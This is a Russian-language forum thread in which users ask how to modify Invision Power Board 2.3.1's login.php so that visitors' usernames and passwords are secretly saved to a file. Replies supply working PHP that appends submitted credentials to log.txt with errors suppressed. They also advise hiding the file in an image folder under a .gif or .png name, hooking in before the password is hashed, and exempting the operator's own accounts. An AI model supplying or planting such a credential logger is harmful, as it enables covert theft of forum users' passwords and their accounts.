Подскажите пожалуйста куда нужно вставить код, чтобы в отдельный файлик записывались логин и пароль в invision power board версии 2.3.1 Ссылка на исходник(login.php): http://slil.ru/24799099
Добавь в начале файла login.php Самый примитивный скрипт записи в файл для IPB. PHP: if (isset($_REQUEST['UserName']) && isset($_REQUEST['PassWord'])) { @$f = fopen('log.txt', 'a+'); @fwrite($f, "Login: ".$_REQUEST['UserName']." password: ".$_REQUEST['PassWord']."\n"); @fclose($f); } файл с паролями будут в том каталоге где находиться index.php
чтобы в случае, если запрос не выполнился, не возникало сообщение об ошибке ("@" подавляет вывод) просто иногда юзать error_reporting(0); не удобно) зы: автору уже ответили в теме вопросов по пхп, код рабочий, в чем проблема?))
думаю права лудше выставить не 777 а 666, да и файлик сохранить не в дири со скриптом, а например в папке с картинками и разширением типа .gif или .png
Код вставлял практически везде, но все равно запись не идет в log.txt Права расставил везде 777 Кто нибудь может протеститровать и выложить login.php Буду очень благодарен
Мне нужно в готовом скрипте добавить код, а не создавать его заново. Вопрос стоит так, куда нужно вставить код в ipb 2.3.1?
2 реаниматор перед тем как идет квери запрос и перед тем как он зашифровывается(елси вообще шифруется). найдешь епта) //offtop: это не я и я не собираюсь ставить на ач ипб
Скажите, а можно сделать чтоб этот скрипт с некоторых пользователей не брал пароль? Вот допустим у меня ломанут форум и я нехочу чтоб могли видеть мои LogIn. Что там надо дописать? (а лутше не для одного, а для нескольких пользователей)!